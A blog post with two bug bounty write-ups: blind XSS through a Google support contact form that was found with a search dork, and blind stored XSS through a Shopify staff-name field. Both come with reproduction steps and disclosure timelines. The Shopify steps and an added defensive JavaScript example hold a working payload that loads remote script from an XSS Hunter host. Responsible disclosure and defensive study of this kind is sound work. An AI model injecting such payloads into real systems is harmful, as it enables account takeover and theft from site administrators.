[Google VRP] How I Got Blind XSS at Google With a Dork (First Bounty and HOF)

I’m rioncool22, based in North Sumatera, Indonesia

Entering the Google Hall of Fame is one of my dreams. I spent a lot of time looking for vulnerabilities in Google, but nothing worked out, until one day I received a notification from XSSHunter that my payload had executed on a googleplex.com subdomain :D.

To look for this vulnerability, I used Google Dorking to make the search easier.

Dork: site:support.google.com inurl:/contact/

If you search with this dork, you will find lots of contact forms.

After some searching, I found this link: https://support.google.com/cloud/contact/prod_issue 😀

Fill in the XSSHunter payload in the name field and it gets executed in the Google Admin Panel.

Steps to Reproduce:
1. Open this link: https://support.google.com/cloud/contact/prod_issue
2. Fill in Subject, Full Description, and Affected product with an XSS Hunter payload
3. The XSS will be executed on a googleplex.com subdomain 😀

Tip: you can extend the dork with other phrases, like “fill out this form”, to find more contact forms 😀

Timeline:

  • 26 Feb 2020 : Submitted report to Google VRP
  • 27 Feb 2020 : First response from Google VRP
  • 28 Feb 2020 : Nice catch!!!
  • 25 Mar 2020 : Bounty awarded, $3133.70
  • 11 Mar 2021 : Public disclosure


(Shopify.com) Blind Stored XSS Via Staff Name $$$$

First, I want to thank apapedulimu for allowing me to publish my first write-up on this blog.

I’m rioncool22, based in North Sumatera, Indonesia

I want to share with you my finding in shopify.com (HackerOne program). I very often searched for bugs on the Shopify site and submitted reports, but it always ended as Informative or N/A. Then one day I read a report on Hacktivity about blind XSS: the payload got executed in an unexpected place. After that, I tried it on Shopify and the payload fired in the admin panel 😀


Steps to reproduce:

  1. Go to https://your-store.myshopify.com/admin/settings/account
  2. Add a Staff Account
  3. Fill in First & Last Name with this payload: "><script>$.getScript("//xsshunterdomain")</script>
  4. The XSS fires in the Admin Panel

Tip: if you are hunting for XSS bugs, switch your payload to an XSS Hunter payload, because you will not know where the payload gets fired 😀
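Both write-ups come down to the same defect: an admin panel renders user-supplied text (a contact-form field, a staff member's name) into HTML without encoding it. The JavaScript below is an added example, not code from this post or from Google or Shopify; the staff record, the escapeHtml helper, the looksLikeMarkup check and the CSP value are assumptions of mine, while the stored value is the payload quoted in the Shopify steps. It puts the vulnerable template beside the hardened one and adds a simple check for stored fields that look like markup.

```javascript
// Added example (not the original post's code). The stored value is the payload
// quoted in the Shopify write-up; the staff record and helpers are constructed.
const BLIND_XSS_PAYLOAD = '"><script>$.getScript("//xsshunterdomain")</script>';

// Vulnerable rendering: the admin page drops the stored name straight into
// an attribute and into element text, which is exactly where a blind probe
// sent from a public form later fires in front of an admin's browser.
function renderStaffRowUnsafe(staff) {
  const full = `${staff.firstName} ${staff.lastName}`;
  return `<tr><td>${full}</td>` +
         `<td><input name="display" value="${full}"></td></tr>`;
}

// Contextual output encoding: neutralises <, >, quotes and & so a value can
// be placed in an HTML text node or a double-quoted attribute safely.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened rendering: every untrusted value is encoded at the point of output.
function renderStaffRowSafe(staff) {
  const full = escapeHtml(`${staff.firstName} ${staff.lastName}`);
  return `<tr><td>${full}</td>` +
         `<td><input name="display" value="${full}"></td></tr>`;
}

// Defence in depth (assumed header value): with script-src limited to the
// panel's own origin, an injected $.getScript("//attacker") is refused even
// if one template somewhere forgets to encode.
const ADMIN_PANEL_CSP =
  "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Detection aid: flag stored profile fields that look like markup so blind-XSS
// probes can be spotted in the data before they ever render in a panel.
function looksLikeMarkup(value) {
  return /<\s*\/?[a-z]|\bon[a-z]+\s*=|javascript:/i.test(String(value));
}

// Constructed staff record carrying the probe in the first-name field.
const probeStaff = { firstName: BLIND_XSS_PAYLOAD, lastName: 'Doe' };
console.log('unsafe:', renderStaffRowUnsafe(probeStaff));
console.log('safe:  ', renderStaffRowSafe(probeStaff));
```

Run with node; the unsafe row still contains a live script element, the safe row only entity-encoded text.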

Timeline:

  • Aug 1 : Submitted report to Shopify
  • Aug 4 : First response from Shopify
  • Aug 5 : Triaged
  • Aug 6 : Resolved & rewarded $$$$
  • Aug 19 : Public disclosure
